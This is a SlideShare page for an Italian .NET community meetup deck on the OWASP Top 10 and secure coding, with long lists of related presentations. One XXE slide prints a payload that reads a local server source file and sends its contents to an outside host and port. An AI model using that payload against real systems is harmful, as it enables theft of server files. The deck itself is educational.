SlideShare a Scribd company logo

Meetup DotNetCode Owasp

dotnetcode
dotnetcode

The document summarizes a presentation given by Fabio Mannis on secure coding practices for .NET developers. It discusses the Open Web Application Security Project (OWASP) Top 10 security risks, including injection, broken authentication, sensitive data exposure, and cross-site scripting. It provides examples of each risk and techniques for avoiding common vulnerabilities like validating and sanitizing untrusted user input, implementing secure password policies, encrypting sensitive data, and using anti-XSS libraries when updating pages with user-supplied content. The presentation aims to help developers write more secure code and avoid vulnerabilities.

1 of 33
Download to read offline
DotNetCode.IT Microsoft .Net Coding Community www.dotnetcode.it MeetUp! #AperiTech
DotNetCode.IT Microsoft .Net Coding Community OWASP: Security for .NET Developers (scrivere codice sicuro o almeno provarci) Benvenuti DotNetCode.IT Microsoft .Net Coding Community
DotNetCode.IT Microsoft .Net Coding Community #AperiTech
DotNetCode.IT Microsoft .Net Coding Community 21 Aprile 2018 - Global Azure Bootcamp bit.ly/gabrome18
DotNetCode.IT Microsoft .Net Coding Community Speaker Software Architect Comdata Digital Fabio Mannis Email : fabio.mannis@outlook.com Linkedin : https://www.linkedin.com/in/fabiomannis/
DotNetCode.IT Microsoft .Net Coding Community AGENDA • Cosa è OWASP • Quali sono i top 10 punti da tenere presente per sviluppare applicazioni web «sicure» • Casi d'uso ed alcuni esempi su come scrivere codice sicuro (o almeno provarci!)
DotNetCode.IT Microsoft .Net Coding Community OWASP
DotNetCode.IT Microsoft .Net Coding Community • The Top 10 provides basic techniques to protect against these high risk problem areas, and provides guidance on where to go from here. • There are hundreds of issues that could affect the overall security of a web application • The OWASP Application Security Verification Standard (ASVS) Project provides a basis for testing web application technical security controls and also provides developers with a list of requirements for secure development.
DotNetCode.IT Microsoft .Net Coding Community OWASP Cheat Sheet Series
DotNetCode.IT Microsoft .Net Coding Community Application Security Verification Standard (ASVS)
DotNetCode.IT Microsoft .Net Coding Community A1:2017- Injection Injection flaws, such as SQL, NoSQL, OS, and LDAP injection, occur when untrusted data is sent to an interpreter as part of a command or query. The attacker’s hostile data can trick the interpreter into executing unintended commands or accessing data without proper authorization.
DotNetCode.IT Microsoft .Net Coding Community A1:2017- Injection In an injection attack, instead of specifying data, the user is able to specify a command. This means that for applications which are vulnerable to injection attacks, hackers can in fact direct the system to perform an action which could lead to data exposure, loss of data integrity, and even data deletion.
DotNetCode.IT Microsoft .Net Coding Community A1:2017- Injection • Sql Injection • Ldap Injection • Command Injection
DotNetCode.IT Microsoft .Net Coding Community A2:2017-Broken Authentication Application functions related to authentication and session management are often implemented incorrectly, allowing attackers to compromise passwords, keys, or session tokens, or to exploit other implementation flaws to assume other users’ identities temporarily or permanently.
DotNetCode.IT Microsoft .Net Coding Community A2:2017-Broken Authentication • Password • Minumum lenght >=10 (or passphrases) • Maximun lenght 128 • Password complexity • Hashing • Secure Password Recovery Mechanism • No cookieless session • TLS!!!
DotNetCode.IT Microsoft .Net Coding Community A2:2017-Broken Authentication • Require re-authentication for Sensitive features (for mitigate CSRF or XSS attacks) • Authentication and Error Messages (generic manner) • Prevent Brute-Force Attacks • Built-in Session Management Implementations (Asp.net core identity) • Cookies • HttpOnly = true;
DotNetCode.IT Microsoft .Net Coding Community A2:2017-Broken Authentication • Cookies • HttpOnly = true; • Default expiration (default : only current browser session valid) • Secure = true; • Domain
DotNetCode.IT Microsoft .Net Coding Community A3:2017- Sensitive Data Exposure Many web applications and APIs do not properly protect sensitive data, such as financial, healthcare, and PII. Attackers may steal or modify such weakly protected data to conduct credit card fraud, identity theft, or other crimes. Sensitive data may be compromised without extra protection, such as encryption at rest or in transit, and requires special precautions when exchanged with the browser
DotNetCode.IT Microsoft .Net Coding Community A4:2017-XML External Entities (XXE) Many older or poorly configured XML processors evaluate external entity references within XML documents. External entities can be used to disclose internal files using the file URI handler, internal file shares, internal port scanning, remote code execution, and denial of service attacks.
DotNetCode.IT Microsoft .Net Coding Community A4:2017-XML External Entities (XXE) <?xml version="1.0" encoding="UTF-8"?> <!ENTITY % stolendata SYSTEM "file:///c:/inetpub/wwwroot/Views/secret_source.cshtml"> <!ENTITY % inception "<!ENTITY % sendit SYSTEM 'http://192.168.1.10:4444/?%stolendata;'>">
DotNetCode.IT Microsoft .Net Coding Community A5:2017-Broken Access Control Restrictions on what authenticated users are allowed to do are often not properly enforced. Attackers can exploit these flaws to access unauthorized functionality and/or data, such as access other users' accounts, view sensitive files, modify other users’ data, change access rights, etc.
DotNetCode.IT Microsoft .Net Coding Community A6:2017-Security Misconfiguration Security misconfiguration is the most commonly seen issue. This is commonly a result of insecure default configurations, incomplete or ad hoc configurations, open cloud storage, misconfigured HTTP headers, and verbose error messages containing sensitive information. Not only must all operating systems, frameworks, libraries, and applications be securely configured, but they must be patched and upgraded in a timely fashion.
DotNetCode.IT Microsoft .Net Coding Community A7:2017- Cross-Site Scripting (XSS) XSS flaws occur whenever an application includes untrusted data in a new web page without proper validation or escaping, or updates an existing web page with user-supplied data using a browser API that can create HTML or JavaScript. XSS allows attackers to execute scripts in the victim’s browser which can hijack user sessions, deface web sites, or redirect the user to malicious sites.
DotNetCode.IT Microsoft .Net Coding Community A8:2017- Insecure Deserialization Insecure deserialization often leads to remote code execution. Even if deserialization flaws do not result in remote code execution, they can be used to perform attacks, including replay attacks, injection attacks, and privilege escalation attacks.
DotNetCode.IT Microsoft .Net Coding Community A9:2017-Using Components with Known Vulnerabilities Components, such as libraries, frameworks, and other software modules, run with the same privileges as the application. If a vulnerable component is exploited, such an attack can facilitate serious data loss or server takeover. Applications and APIs using components with known vulnerabilities may undermine application defenses and enable various attacks and impacts.
DotNetCode.IT Microsoft .Net Coding Community A10:2017- Insufficient Logging & Monitoring Insufficient logging and monitoring, coupled with missing or ineffective integration with incident response, allows attackers to further attack systems, maintain persistence, pivot to more systems, and tamper, extract, or destroy data. Most breach studies show time to detect a breach is over 200 days, typically detected by external parties rather than internal processes or monitoring.
DotNetCode.IT Microsoft .Net Coding Community
DotNetCode.IT Microsoft .Net Coding Community DotNetCode.IT Microsoft .Net Coding Community
DotNetCode.IT Microsoft .Net Coding Community Prossimo Evento Leonardo D’Ottavi Data: 18/05/2018
DotNetCode.IT Microsoft .Net Coding Community Global Azure Bootcamp 2018 bit.ly/gabrome18
DotNetCode.IT Microsoft .Net Coding Community Selfie Lottery www.dotnetcode.it http://bit.ly/sldnc20180418
DotNetCode.IT Microsoft .Net Coding Community Grazie a Tutti! DotNetCode.IT Microsoft .Net Coding Community
DotNetCode.IT Microsoft .Net Coding Community Follow US! www.dotnetcode.it https://www.facebook.com/DotNetCode.IT https://twitter.com/DotNetCodeIT https://plus.google.com/+DotnetcodeIt
Ad

Recommended

Web Application Security and Awareness
Web Application Security and AwarenessWeb Application Security and Awareness
Web Application Security and Awareness
Abdul Rahman Sherzad
 
Pentesting Your Own Wireless Networks, June 2011 Issue
Pentesting Your Own Wireless Networks, June 2011 IssuePentesting Your Own Wireless Networks, June 2011 Issue
Pentesting Your Own Wireless Networks, June 2011 Issue
Ishan Girdhar
 
Beyond the OWASP Top 10
Beyond the OWASP Top 10Beyond the OWASP Top 10
Beyond the OWASP Top 10
iphonepentest
 
The New OWASP Top Ten: Let's Cut to the Chase
The New OWASP Top Ten: Let's Cut to the ChaseThe New OWASP Top Ten: Let's Cut to the Chase
The New OWASP Top Ten: Let's Cut to the Chase
Security Innovation
 
[OPD 2019] Inter-application vulnerabilities
[OPD 2019] Inter-application vulnerabilities[OPD 2019] Inter-application vulnerabilities
[OPD 2019] Inter-application vulnerabilities
OWASP
 
Web Application Security 101
Web Application Security 101Web Application Security 101
Web Application Security 101
Cybersecurity Education and Research Centre
 
Application Security - Your Success Depends on it
Application Security - Your Success Depends on itApplication Security - Your Success Depends on it
Application Security - Your Success Depends on it
WSO2
 
Owasp 2017 oveview
Owasp 2017 oveviewOwasp 2017 oveview
Owasp 2017 oveview
Shreyas N
 
Owasp
Owasp Owasp
Owasp
penetration Tester
 
Oh, WASP! Security Essentials for Web Apps
Oh, WASP! Security Essentials for Web AppsOh, WASP! Security Essentials for Web Apps
Oh, WASP! Security Essentials for Web Apps
TechWell
 
Benefits of Web Application Firewall
Benefits of Web Application FirewallBenefits of Web Application Firewall
Benefits of Web Application Firewall
davidjohnrace
 
OWASP Top 10 2017
OWASP Top 10 2017OWASP Top 10 2017
OWASP Top 10 2017
Siddharth Phatarphod
 
Owasp Mobile Risk Series : M3 : Insufficient Transport Layer Protection
Owasp Mobile Risk Series : M3 : Insufficient Transport Layer ProtectionOwasp Mobile Risk Series : M3 : Insufficient Transport Layer Protection
Owasp Mobile Risk Series : M3 : Insufficient Transport Layer Protection
Anant Shrivastava
 
Windows 10 and the cloud: Why the future needs hybrid solutions
Windows 10 and the cloud: Why the future needs hybrid solutionsWindows 10 and the cloud: Why the future needs hybrid solutions
Windows 10 and the cloud: Why the future needs hybrid solutions
Alexander Benoit
 
iOS Security: The Never-Ending Story of Malicious Profiles
iOS Security: The Never-Ending Story of Malicious ProfilesiOS Security: The Never-Ending Story of Malicious Profiles
iOS Security: The Never-Ending Story of Malicious Profiles
Yair Amit
 
Zero Trust Networks
Zero Trust NetworksZero Trust Networks
Zero Trust Networks
Practical Code, LLC
 
Owasp top 10 web application security risks 2017
Owasp top 10 web application security risks 2017Owasp top 10 web application security risks 2017
Owasp top 10 web application security risks 2017
Sampath Bhargav Pinnam
 
Web App Security Presentation by Ryan Holland - 05-31-2017
Web App Security Presentation by Ryan Holland - 05-31-2017Web App Security Presentation by Ryan Holland - 05-31-2017
Web App Security Presentation by Ryan Holland - 05-31-2017
TriNimbus
 
Prevoty Integri Datasheet
Prevoty Integri DatasheetPrevoty Integri Datasheet
Prevoty Integri Datasheet
Prevoty
 
Protecting Against Vulnerabilities in SharePoint Add-ons
Protecting Against Vulnerabilities in SharePoint Add-onsProtecting Against Vulnerabilities in SharePoint Add-ons
Protecting Against Vulnerabilities in SharePoint Add-ons
Imperva
 
Web application security
Web application securityWeb application security
Web application security
Kapil Sharma
 
Point-Of-Sale Hacking - 2600Thailand#20
Point-Of-Sale Hacking - 2600Thailand#20Point-Of-Sale Hacking - 2600Thailand#20
Point-Of-Sale Hacking - 2600Thailand#20
Prathan Phongthiproek
 
Untitled 1
Untitled 1Untitled 1
Untitled 1
Sergey Kochergan
 
OWASP Top 10 - 2017 Top 10 web application security risks
OWASP Top 10 - 2017 Top 10 web application security risksOWASP Top 10 - 2017 Top 10 web application security risks
OWASP Top 10 - 2017 Top 10 web application security risks
Kun-Da Wu
 
[OPD 2019] AST Platform and the importance of multi-layered application secu...
[OPD 2019] AST Platform and the importance of multi-layered application secu...[OPD 2019] AST Platform and the importance of multi-layered application secu...
[OPD 2019] AST Platform and the importance of multi-layered application secu...
OWASP
 
Transforming your Security Products at the Endpoint
Transforming your Security Products at the EndpointTransforming your Security Products at the Endpoint
Transforming your Security Products at the Endpoint
Ivanti
 
Owasp top 10
Owasp top 10Owasp top 10
Owasp top 10
YasserElsnbary
 
Owasp top 10 2017
Owasp top 10 2017Owasp top 10 2017
Owasp top 10 2017
ibrahimumer2
 
A security note for web developers
A security note for web developersA security note for web developers
A security note for web developers
John Ombagi
 
Secure coding guidelines
Secure coding guidelinesSecure coding guidelines
Secure coding guidelines
Zakaria SMAHI
 
Ad

More Related Content

What's hot (20)

Owasp
Owasp Owasp
Owasp
penetration Tester
 
Oh, WASP! Security Essentials for Web Apps
Oh, WASP! Security Essentials for Web AppsOh, WASP! Security Essentials for Web Apps
Oh, WASP! Security Essentials for Web Apps
TechWell
 
Benefits of Web Application Firewall
Benefits of Web Application FirewallBenefits of Web Application Firewall
Benefits of Web Application Firewall
davidjohnrace
 
OWASP Top 10 2017
OWASP Top 10 2017OWASP Top 10 2017
OWASP Top 10 2017
Siddharth Phatarphod
 
Owasp Mobile Risk Series : M3 : Insufficient Transport Layer Protection
Owasp Mobile Risk Series : M3 : Insufficient Transport Layer ProtectionOwasp Mobile Risk Series : M3 : Insufficient Transport Layer Protection
Owasp Mobile Risk Series : M3 : Insufficient Transport Layer Protection
Anant Shrivastava
 
Windows 10 and the cloud: Why the future needs hybrid solutions
Windows 10 and the cloud: Why the future needs hybrid solutionsWindows 10 and the cloud: Why the future needs hybrid solutions
Windows 10 and the cloud: Why the future needs hybrid solutions
Alexander Benoit
 
iOS Security: The Never-Ending Story of Malicious Profiles
iOS Security: The Never-Ending Story of Malicious ProfilesiOS Security: The Never-Ending Story of Malicious Profiles
iOS Security: The Never-Ending Story of Malicious Profiles
Yair Amit
 
Zero Trust Networks
Zero Trust NetworksZero Trust Networks
Zero Trust Networks
Practical Code, LLC
 
Owasp top 10 web application security risks 2017
Owasp top 10 web application security risks 2017Owasp top 10 web application security risks 2017
Owasp top 10 web application security risks 2017
Sampath Bhargav Pinnam
 
Web App Security Presentation by Ryan Holland - 05-31-2017
Web App Security Presentation by Ryan Holland - 05-31-2017Web App Security Presentation by Ryan Holland - 05-31-2017
Web App Security Presentation by Ryan Holland - 05-31-2017
TriNimbus
 
Prevoty Integri Datasheet
Prevoty Integri DatasheetPrevoty Integri Datasheet
Prevoty Integri Datasheet
Prevoty
 
Protecting Against Vulnerabilities in SharePoint Add-ons
Protecting Against Vulnerabilities in SharePoint Add-onsProtecting Against Vulnerabilities in SharePoint Add-ons
Protecting Against Vulnerabilities in SharePoint Add-ons
Imperva
 
Web application security
Web application securityWeb application security
Web application security
Kapil Sharma
 
Point-Of-Sale Hacking - 2600Thailand#20
Point-Of-Sale Hacking - 2600Thailand#20Point-Of-Sale Hacking - 2600Thailand#20
Point-Of-Sale Hacking - 2600Thailand#20
Prathan Phongthiproek
 
Untitled 1
Untitled 1Untitled 1
Untitled 1
Sergey Kochergan
 
OWASP Top 10 - 2017 Top 10 web application security risks
OWASP Top 10 - 2017 Top 10 web application security risksOWASP Top 10 - 2017 Top 10 web application security risks
OWASP Top 10 - 2017 Top 10 web application security risks
Kun-Da Wu
 
[OPD 2019] AST Platform and the importance of multi-layered application secu...
[OPD 2019] AST Platform and the importance of multi-layered application secu...[OPD 2019] AST Platform and the importance of multi-layered application secu...
[OPD 2019] AST Platform and the importance of multi-layered application secu...
OWASP
 
Transforming your Security Products at the Endpoint
Transforming your Security Products at the EndpointTransforming your Security Products at the Endpoint
Transforming your Security Products at the Endpoint
Ivanti
 
Owasp top 10
Owasp top 10Owasp top 10
Owasp top 10
YasserElsnbary
 
Owasp top 10 2017
Owasp top 10 2017Owasp top 10 2017
Owasp top 10 2017
ibrahimumer2
 
Owasp
Owasp Owasp
Owasp
penetration Tester
 
Oh, WASP! Security Essentials for Web Apps
Oh, WASP! Security Essentials for Web AppsOh, WASP! Security Essentials for Web Apps
Oh, WASP! Security Essentials for Web Apps
TechWell
 
Benefits of Web Application Firewall
Benefits of Web Application FirewallBenefits of Web Application Firewall
Benefits of Web Application Firewall
davidjohnrace
 
OWASP Top 10 2017
OWASP Top 10 2017OWASP Top 10 2017
OWASP Top 10 2017
Siddharth Phatarphod
 
Owasp Mobile Risk Series : M3 : Insufficient Transport Layer Protection
Owasp Mobile Risk Series : M3 : Insufficient Transport Layer ProtectionOwasp Mobile Risk Series : M3 : Insufficient Transport Layer Protection
Owasp Mobile Risk Series : M3 : Insufficient Transport Layer Protection
Anant Shrivastava
 
Windows 10 and the cloud: Why the future needs hybrid solutions
Windows 10 and the cloud: Why the future needs hybrid solutionsWindows 10 and the cloud: Why the future needs hybrid solutions
Windows 10 and the cloud: Why the future needs hybrid solutions
Alexander Benoit
 
iOS Security: The Never-Ending Story of Malicious Profiles
iOS Security: The Never-Ending Story of Malicious ProfilesiOS Security: The Never-Ending Story of Malicious Profiles
iOS Security: The Never-Ending Story of Malicious Profiles
Yair Amit
 
Zero Trust Networks
Zero Trust NetworksZero Trust Networks
Zero Trust Networks
Practical Code, LLC
 
Owasp top 10 web application security risks 2017
Owasp top 10 web application security risks 2017Owasp top 10 web application security risks 2017
Owasp top 10 web application security risks 2017
Sampath Bhargav Pinnam
 
Web App Security Presentation by Ryan Holland - 05-31-2017
Web App Security Presentation by Ryan Holland - 05-31-2017Web App Security Presentation by Ryan Holland - 05-31-2017
Web App Security Presentation by Ryan Holland - 05-31-2017
TriNimbus
 
Prevoty Integri Datasheet
Prevoty Integri DatasheetPrevoty Integri Datasheet
Prevoty Integri Datasheet
Prevoty
 
Protecting Against Vulnerabilities in SharePoint Add-ons
Protecting Against Vulnerabilities in SharePoint Add-onsProtecting Against Vulnerabilities in SharePoint Add-ons
Protecting Against Vulnerabilities in SharePoint Add-ons
Imperva
 
Web application security
Web application securityWeb application security
Web application security
Kapil Sharma
 
Point-Of-Sale Hacking - 2600Thailand#20
Point-Of-Sale Hacking - 2600Thailand#20Point-Of-Sale Hacking - 2600Thailand#20
Point-Of-Sale Hacking - 2600Thailand#20
Prathan Phongthiproek
 
Untitled 1
Untitled 1Untitled 1
Untitled 1
Sergey Kochergan
 
OWASP Top 10 - 2017 Top 10 web application security risks
OWASP Top 10 - 2017 Top 10 web application security risksOWASP Top 10 - 2017 Top 10 web application security risks
OWASP Top 10 - 2017 Top 10 web application security risks
Kun-Da Wu
 
[OPD 2019] AST Platform and the importance of multi-layered application secu...
[OPD 2019] AST Platform and the importance of multi-layered application secu...[OPD 2019] AST Platform and the importance of multi-layered application secu...
[OPD 2019] AST Platform and the importance of multi-layered application secu...
OWASP
 
Transforming your Security Products at the Endpoint
Transforming your Security Products at the EndpointTransforming your Security Products at the Endpoint
Transforming your Security Products at the Endpoint
Ivanti
 
Owasp top 10
Owasp top 10Owasp top 10
Owasp top 10
YasserElsnbary
 
Owasp top 10 2017
Owasp top 10 2017Owasp top 10 2017
Owasp top 10 2017
ibrahimumer2
 

Similar to Meetup DotNetCode Owasp (20)

A security note for web developers
A security note for web developersA security note for web developers
A security note for web developers
John Ombagi
 
Secure coding guidelines
Secure coding guidelinesSecure coding guidelines
Secure coding guidelines
Zakaria SMAHI
 
Website hacking and prevention (All Tools,Topics & Technique )
Website hacking and prevention (All Tools,Topics & Technique )Website hacking and prevention (All Tools,Topics & Technique )
Website hacking and prevention (All Tools,Topics & Technique )
Jay Nagar
 
Writing Secure Code – Threat Defense
Writing Secure Code – Threat DefenseWriting Secure Code – Threat Defense
Writing Secure Code – Threat Defense
amiable_indian
 
Application Security Guide for Beginners
Application Security Guide for Beginners Application Security Guide for Beginners
Application Security Guide for Beginners
Checkmarx
 
Cybersecurity update 12
Cybersecurity update 12Cybersecurity update 12
Cybersecurity update 12
Jim Kaplan CIA CFE
 
2013 OWASP Top 10
2013 OWASP Top 102013 OWASP Top 10
2013 OWASP Top 10
bilcorry
 
Web Apps Security
Web Apps SecurityWeb Apps Security
Web Apps Security
Victor Bucutea
 
Secure coding presentation Oct 3 2020
Secure coding presentation Oct 3 2020Secure coding presentation Oct 3 2020
Secure coding presentation Oct 3 2020
Moataz Kamel
 
Module 12 (web application vulnerabilities)
Module 12 (web application vulnerabilities)Module 12 (web application vulnerabilities)
Module 12 (web application vulnerabilities)
Wail Hassan
 
Network Security - Real and Present Dangers
Network Security - Real and Present DangersNetwork Security - Real and Present Dangers
Network Security - Real and Present Dangers
Peter Wood
 
Jan 2008 Allup
Jan 2008 AllupJan 2008 Allup
Jan 2008 Allup
llangit
 
OWASP Portland - OWASP Top 10 For JavaScript Developers
OWASP Portland - OWASP Top 10 For JavaScript DevelopersOWASP Portland - OWASP Top 10 For JavaScript Developers
OWASP Portland - OWASP Top 10 For JavaScript Developers
Lewis Ardern
 
Solvay secure application layer v2015 seba
Solvay secure application layer v2015 sebaSolvay secure application layer v2015 seba
Solvay secure application layer v2015 seba
Sebastien Deleersnyder
 
Protect Your IT Infrastructure from Zero-Day Attacks and New Vulnerabilities
Protect Your IT Infrastructure from Zero-Day Attacks and New VulnerabilitiesProtect Your IT Infrastructure from Zero-Day Attacks and New Vulnerabilities
Protect Your IT Infrastructure from Zero-Day Attacks and New Vulnerabilities
Symantec
 
Network security, seriously?
Network security, seriously?Network security, seriously?
Network security, seriously?
Peter Wood
 
For Business's Sake, Let's focus on AppSec
For Business's Sake, Let's focus on AppSecFor Business's Sake, Let's focus on AppSec
For Business's Sake, Let's focus on AppSec
Lalit Kale
 
Log Analytics for Distributed Microservices
Log Analytics for Distributed MicroservicesLog Analytics for Distributed Microservices
Log Analytics for Distributed Microservices
Kai Wähner
 
owasp top 10 security risk categories and CWE
owasp top 10 security risk categories and CWEowasp top 10 security risk categories and CWE
owasp top 10 security risk categories and CWE
Arun Voleti
 
IRJET- Bug Hunting using Web Application Penetration Testing Techniques.
IRJET- Bug Hunting using Web Application Penetration Testing Techniques.IRJET- Bug Hunting using Web Application Penetration Testing Techniques.
IRJET- Bug Hunting using Web Application Penetration Testing Techniques.
IRJET Journal
 
A security note for web developers
A security note for web developersA security note for web developers
A security note for web developers
John Ombagi
 
Secure coding guidelines
Secure coding guidelinesSecure coding guidelines
Secure coding guidelines
Zakaria SMAHI
 
Website hacking and prevention (All Tools,Topics & Technique )
Website hacking and prevention (All Tools,Topics & Technique )Website hacking and prevention (All Tools,Topics & Technique )
Website hacking and prevention (All Tools,Topics & Technique )
Jay Nagar
 
Writing Secure Code – Threat Defense
Writing Secure Code – Threat DefenseWriting Secure Code – Threat Defense
Writing Secure Code – Threat Defense
amiable_indian
 
Application Security Guide for Beginners
Application Security Guide for Beginners Application Security Guide for Beginners
Application Security Guide for Beginners
Checkmarx
 
Cybersecurity update 12
Cybersecurity update 12Cybersecurity update 12
Cybersecurity update 12
Jim Kaplan CIA CFE
 
2013 OWASP Top 10
2013 OWASP Top 102013 OWASP Top 10
2013 OWASP Top 10
bilcorry
 
Web Apps Security
Web Apps SecurityWeb Apps Security
Web Apps Security
Victor Bucutea
 
Secure coding presentation Oct 3 2020
Secure coding presentation Oct 3 2020Secure coding presentation Oct 3 2020
Secure coding presentation Oct 3 2020
Moataz Kamel
 
Module 12 (web application vulnerabilities)
Module 12 (web application vulnerabilities)Module 12 (web application vulnerabilities)
Module 12 (web application vulnerabilities)
Wail Hassan
 
Network Security - Real and Present Dangers
Network Security - Real and Present DangersNetwork Security - Real and Present Dangers
Network Security - Real and Present Dangers
Peter Wood
 
Jan 2008 Allup
Jan 2008 AllupJan 2008 Allup
Jan 2008 Allup
llangit
 
OWASP Portland - OWASP Top 10 For JavaScript Developers
OWASP Portland - OWASP Top 10 For JavaScript DevelopersOWASP Portland - OWASP Top 10 For JavaScript Developers
OWASP Portland - OWASP Top 10 For JavaScript Developers
Lewis Ardern
 
Solvay secure application layer v2015 seba
Solvay secure application layer v2015 sebaSolvay secure application layer v2015 seba
Solvay secure application layer v2015 seba
Sebastien Deleersnyder
 
Protect Your IT Infrastructure from Zero-Day Attacks and New Vulnerabilities
Protect Your IT Infrastructure from Zero-Day Attacks and New VulnerabilitiesProtect Your IT Infrastructure from Zero-Day Attacks and New Vulnerabilities
Protect Your IT Infrastructure from Zero-Day Attacks and New Vulnerabilities
Symantec
 
Network security, seriously?
Network security, seriously?Network security, seriously?
Network security, seriously?
Peter Wood
 
For Business's Sake, Let's focus on AppSec
For Business's Sake, Let's focus on AppSecFor Business's Sake, Let's focus on AppSec
For Business's Sake, Let's focus on AppSec
Lalit Kale
 
Log Analytics for Distributed Microservices
Log Analytics for Distributed MicroservicesLog Analytics for Distributed Microservices
Log Analytics for Distributed Microservices
Kai Wähner
 
owasp top 10 security risk categories and CWE
owasp top 10 security risk categories and CWEowasp top 10 security risk categories and CWE
owasp top 10 security risk categories and CWE
Arun Voleti
 
IRJET- Bug Hunting using Web Application Penetration Testing Techniques.
IRJET- Bug Hunting using Web Application Penetration Testing Techniques.IRJET- Bug Hunting using Web Application Penetration Testing Techniques.
IRJET- Bug Hunting using Web Application Penetration Testing Techniques.
IRJET Journal
 
Ad

More from dotnetcode (19)

Azure Meetup: Novità CosmosDB modalità Serverless e Cognitive Services
Azure Meetup: Novità CosmosDB modalità Serverless e Cognitive ServicesAzure Meetup: Novità CosmosDB modalità Serverless e Cognitive Services
Azure Meetup: Novità CosmosDB modalità Serverless e Cognitive Services
dotnetcode
 
Azure Meetup: Understanding Azure App Service Plan
Azure Meetup: Understanding Azure App Service PlanAzure Meetup: Understanding Azure App Service Plan
Azure Meetup: Understanding Azure App Service Plan
dotnetcode
 
Azure Meetup: Keep your secrets and configurations safe in azure!
Azure Meetup: Keep your secrets and configurations safe in azure!Azure Meetup: Keep your secrets and configurations safe in azure!
Azure Meetup: Keep your secrets and configurations safe in azure!
dotnetcode
 
Azure Meetup: Azure Storage/Datalake Deep Dive
Azure Meetup: Azure Storage/Datalake Deep DiveAzure Meetup: Azure Storage/Datalake Deep Dive
Azure Meetup: Azure Storage/Datalake Deep Dive
dotnetcode
 
Meetup Azure DevOps
Meetup Azure DevOpsMeetup Azure DevOps
Meetup Azure DevOps
dotnetcode
 
Meetup Fluent Design e Progressive Web App
Meetup Fluent Design e Progressive Web AppMeetup Fluent Design e Progressive Web App
Meetup Fluent Design e Progressive Web App
dotnetcode
 
Meetup Progressive Web App
Meetup Progressive Web AppMeetup Progressive Web App
Meetup Progressive Web App
dotnetcode
 
Meetup ASP.NET Core e Kubernetes
Meetup ASP.NET Core e KubernetesMeetup ASP.NET Core e Kubernetes
Meetup ASP.NET Core e Kubernetes
dotnetcode
 
How to create custom modules for Visual Studio
How to create custom modules for Visual StudioHow to create custom modules for Visual Studio
How to create custom modules for Visual Studio
dotnetcode
 
Exploring VS Code
Exploring VS CodeExploring VS Code
Exploring VS Code
dotnetcode
 
Meetup Azure DevOps
Meetup Azure DevOpsMeetup Azure DevOps
Meetup Azure DevOps
dotnetcode
 
Meetup ASP.NET Core 2 e Docker
Meetup ASP.NET Core 2 e Docker Meetup ASP.NET Core 2 e Docker
Meetup ASP.NET Core 2 e Docker
dotnetcode
 
Meetup DotNetCode Settembre 2018 - ASP.NET Core 2.1
Meetup DotNetCode Settembre 2018 - ASP.NET Core 2.1Meetup DotNetCode Settembre 2018 - ASP.NET Core 2.1
Meetup DotNetCode Settembre 2018 - ASP.NET Core 2.1
dotnetcode
 
Meetup DotNetCode A.I. Bot Framework and Azure Functions
Meetup DotNetCode A.I. Bot Framework and Azure FunctionsMeetup DotNetCode A.I. Bot Framework and Azure Functions
Meetup DotNetCode A.I. Bot Framework and Azure Functions
dotnetcode
 
Meetup .NET & Micro ORM
Meetup .NET & Micro ORMMeetup .NET & Micro ORM
Meetup .NET & Micro ORM
dotnetcode
 
Meetup ASP.NET Core Angular
Meetup ASP.NET Core AngularMeetup ASP.NET Core Angular
Meetup ASP.NET Core Angular
dotnetcode
 
Webhooks Meetup
Webhooks MeetupWebhooks Meetup
Webhooks Meetup
dotnetcode
 
Meetup DotNetCode Dependency Injection
Meetup DotNetCode Dependency InjectionMeetup DotNetCode Dependency Injection
Meetup DotNetCode Dependency Injection
dotnetcode
 
Presentazione DotNetSchool
Presentazione DotNetSchoolPresentazione DotNetSchool
Presentazione DotNetSchool
dotnetcode
 
Azure Meetup: Novità CosmosDB modalità Serverless e Cognitive Services
Azure Meetup: Novità CosmosDB modalità Serverless e Cognitive ServicesAzure Meetup: Novità CosmosDB modalità Serverless e Cognitive Services
Azure Meetup: Novità CosmosDB modalità Serverless e Cognitive Services
dotnetcode
 
Azure Meetup: Understanding Azure App Service Plan
Azure Meetup: Understanding Azure App Service PlanAzure Meetup: Understanding Azure App Service Plan
Azure Meetup: Understanding Azure App Service Plan
dotnetcode
 
Azure Meetup: Keep your secrets and configurations safe in azure!
Azure Meetup: Keep your secrets and configurations safe in azure!Azure Meetup: Keep your secrets and configurations safe in azure!
Azure Meetup: Keep your secrets and configurations safe in azure!
dotnetcode
 
Azure Meetup: Azure Storage/Datalake Deep Dive
Azure Meetup: Azure Storage/Datalake Deep DiveAzure Meetup: Azure Storage/Datalake Deep Dive
Azure Meetup: Azure Storage/Datalake Deep Dive
dotnetcode
 
Meetup Azure DevOps
Meetup Azure DevOpsMeetup Azure DevOps
Meetup Azure DevOps
dotnetcode
 
Meetup Fluent Design e Progressive Web App
Meetup Fluent Design e Progressive Web AppMeetup Fluent Design e Progressive Web App
Meetup Fluent Design e Progressive Web App
dotnetcode
 
Meetup Progressive Web App
Meetup Progressive Web AppMeetup Progressive Web App
Meetup Progressive Web App
dotnetcode
 
Meetup ASP.NET Core e Kubernetes
Meetup ASP.NET Core e KubernetesMeetup ASP.NET Core e Kubernetes
Meetup ASP.NET Core e Kubernetes
dotnetcode
 
How to create custom modules for Visual Studio
How to create custom modules for Visual StudioHow to create custom modules for Visual Studio
How to create custom modules for Visual Studio
dotnetcode
 
Exploring VS Code
Exploring VS CodeExploring VS Code
Exploring VS Code
dotnetcode
 
Meetup Azure DevOps
Meetup Azure DevOpsMeetup Azure DevOps
Meetup Azure DevOps
dotnetcode
 
Meetup ASP.NET Core 2 e Docker
Meetup ASP.NET Core 2 e Docker Meetup ASP.NET Core 2 e Docker
Meetup ASP.NET Core 2 e Docker
dotnetcode
 
Meetup DotNetCode Settembre 2018 - ASP.NET Core 2.1
Meetup DotNetCode Settembre 2018 - ASP.NET Core 2.1Meetup DotNetCode Settembre 2018 - ASP.NET Core 2.1
Meetup DotNetCode Settembre 2018 - ASP.NET Core 2.1
dotnetcode
 
Meetup DotNetCode A.I. Bot Framework and Azure Functions
Meetup DotNetCode A.I. Bot Framework and Azure FunctionsMeetup DotNetCode A.I. Bot Framework and Azure Functions
Meetup DotNetCode A.I. Bot Framework and Azure Functions
dotnetcode
 
Meetup .NET & Micro ORM
Meetup .NET & Micro ORMMeetup .NET & Micro ORM
Meetup .NET & Micro ORM
dotnetcode
